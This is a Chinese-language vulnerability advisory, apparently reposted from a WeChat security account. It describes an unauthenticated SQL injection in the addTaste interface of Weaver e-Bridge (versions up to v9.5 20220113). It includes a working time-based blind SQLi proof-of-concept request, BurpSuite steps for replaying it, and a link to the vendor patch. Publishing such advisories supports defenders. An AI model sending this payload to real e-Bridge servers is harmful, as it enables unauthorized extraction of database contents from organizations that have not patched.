漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞

admin 2024年1月3日23:00:20评论49 views字数 1326阅读4分25秒阅读模式
漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞

泛微云桥 e-Bridge addTaste接口SQL注入漏洞

前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请联系。

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞

漏洞详情: 

泛微云桥e-Bridge OA是一种基于云计算和移动互联网技术的企业办公自动化(OA)解决方案。它由中国的企业软件开发公司泛微软件开发,旨在帮助企业实现高效的办公管理和协同工作。由于泛微云桥e-Bridge平台addTaste接口存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取数据库权限及数据库的敏感数据。

影响范围


泛微云桥 e-Bridge <= v9.5 20220113

漏洞利用

poc
GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36Accept: */*Cookie: EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18; sl-session=BmCjG8ZweGWzoSGpQ1QgQg==; EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10Accept-Encoding: gzipSL-CE-SUID: 25

使用方法:


1、打开泛微云桥e-Bridge登录首页,使用BurpSuite拦截请求包
2、将抓到的请求包进行修改,将GET内容修改为POC的

GET:
/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1


3、其他内容不修改,然后放包后即可复现。


漏洞修复建议

目前官方已发布安全更新,受影响用户可通过官网安装补丁更新。

官方下载地址:

https://www.weaver.com.cn/subpage/aboutus/news/news-detail.html?id=934


感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持。

原文始发于微信公众号(不秃头的安全):漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月3日23:00:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞情报-泛微云桥 e-Bridge addTaste接口SQL注入漏洞http://cn-sec.com/archives/2350552.html

发表评论

匿名网友 填写信息